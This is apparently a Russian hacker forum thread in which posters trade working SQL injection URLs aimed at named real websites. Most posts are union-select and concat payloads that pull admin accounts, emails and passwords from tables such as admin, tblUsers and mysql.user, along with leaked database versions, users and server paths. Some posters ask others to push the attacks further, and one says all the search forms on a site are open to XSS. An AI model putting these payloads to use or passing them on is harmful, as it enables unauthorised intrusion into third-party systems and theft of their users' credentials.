SQL Инъекции

cash

http://www.emotive.ru/shop/index.php?CID=9999999999+union+select+2,3%20from%20koncert/*

 

_http://www.abcinformation.org/news_display.php?news_id=82+union+select+1,2,3,4,5,6,7,8,9,10/*
_http://www.impactsoft.ru/news_podr.php?news_id=91+union+select+1,2,3,4,5/*
_http://www.ratman.tv/news_estesa.php?news_ID=27+union+select+1,2,3,4/*
_http://www.pariteia.org/news_details.php?news_id=46+union+select+1,2,3,4,5,6,7,8,9/*
буду благодарен если кто нить в личку напишет вариант развития на одном из примеров, самому пока не удалось.

 

http://abcinformation.org/news_display.php?news_id=82+union+select+1,2,concat(id,char(59),answer,char(59),question),4,5,6,7,8,9,10+from+faq/*

http://abcinformation.org/news_display.php?news_id=82+union+select+1,2,concat(id,char(59),name,char(59),date),4,5,6,7,8,9,10+from+news/*

http://ratman.tv/news_estesa.php?news_ID=27+union+select+1,2,concat(admin_id,char(59),admin_user,char(59),admin_email),4+from+admin/*

нашол такие имена таблиц:
users
group
partners
news
e-mail
key
option
table
faq

 

Это за SQL Инъекции сойдёт? http://www.amper-com.ru/index.php?action=GlobalSearch&submit=wgsform&news=on&products=on&articles=on&words='

 

Редкость на aspx

http://barijessence.com/?Page=ModelShow&ProductID=1+or+1=(select+top+1+UserLoginName%2B':'%2BUserPassword+from+tblUsers+where+id=3)--

 

ФК Химки

_http://www.fckhimki.ru/modules/news/index.php?current_id=1&news_id=514+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/*

 

http://www.hyipranks.com/?a=details&lid=2575+ORDER+BY+3/*

 

http://calipsogold.com/index.php?page='

 

http://ru-hosting.ru/article.php/?sid=999+union+select+null,null,null,null,null,uid+from+users+where+uid=2/*

 

http://www.bis-broker.com/sell/offer/?id=-3382%20union%20select%201,2,3,4,5,6,7,8,9,char(106),11,22,33,44,55,66,77,88,99,char(107),111,222,333,444,555,666,777,888,999,char(108),1111,2222,3333,4444,5555,6666--
Таблица users с полями id, pass, name, email
Но почему-то если сделать from users, то пропадают результаты. Кто сможет что-то сделать новое, отпишите сюда или в ПМ.
Спасибо.

 

Нашел такую уязвимость SQL:
http://www.rusfond.ru/thank.html?user_id=hi'1=1--

 

http://www.eko.net.ua/index.php?page=docs&id=-26+UNION+SELECT+1,2,3,4,5,6,7,8

Version: 4.0.21-standard
Database: eko
User: eko@localhost
OS: Unix
/www/host/eko/htdocs/

 

http://www.smotri.te.ua/index.php?inc=catalog&under=-6125+union+select+1,2,3,4/*

Version: 4.0.21-standard
Database: smotri
User: smotri@localhost
OS: Unix
/www/host/smotri/htdocs/

 

http://www.crimeahouse.ru/index.php?pageId=24&id='2751
http://www.scoe.org/content.php?PageId=-1+union+select+1/*
http://www.slc.edu/index.php?pageID=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/*

 

delete...

 

http://www.mka.ru/?p=44035'

 

_http://altholding.ru/database1.html?firm=-1+union+select+1,convert(user+using+cp1251),convert(version()+using+cp1251),convert(user()+using+cp1251),convert(password+using+cp1251)+from+mysql.user/*&type=2

 

MTV​

Code:

http://www.mtvasia.com/ubbthreads2/search.php?Cat=1)+union+select+1/*

 

_http://www.kkzmir.ru/gal.php?id=3+union+select+1,USER(),3,4/*

 

_http://shop.paintball.ru/index.php?act=ob&id=3+union+select+1,2,3/*
_http://www.paintball.ru/next.php?id=9+union+select+null,null,null/*
во всех формах поиска xss

_http://qwerty.ru/qwerty/antivirus+union+select+1/*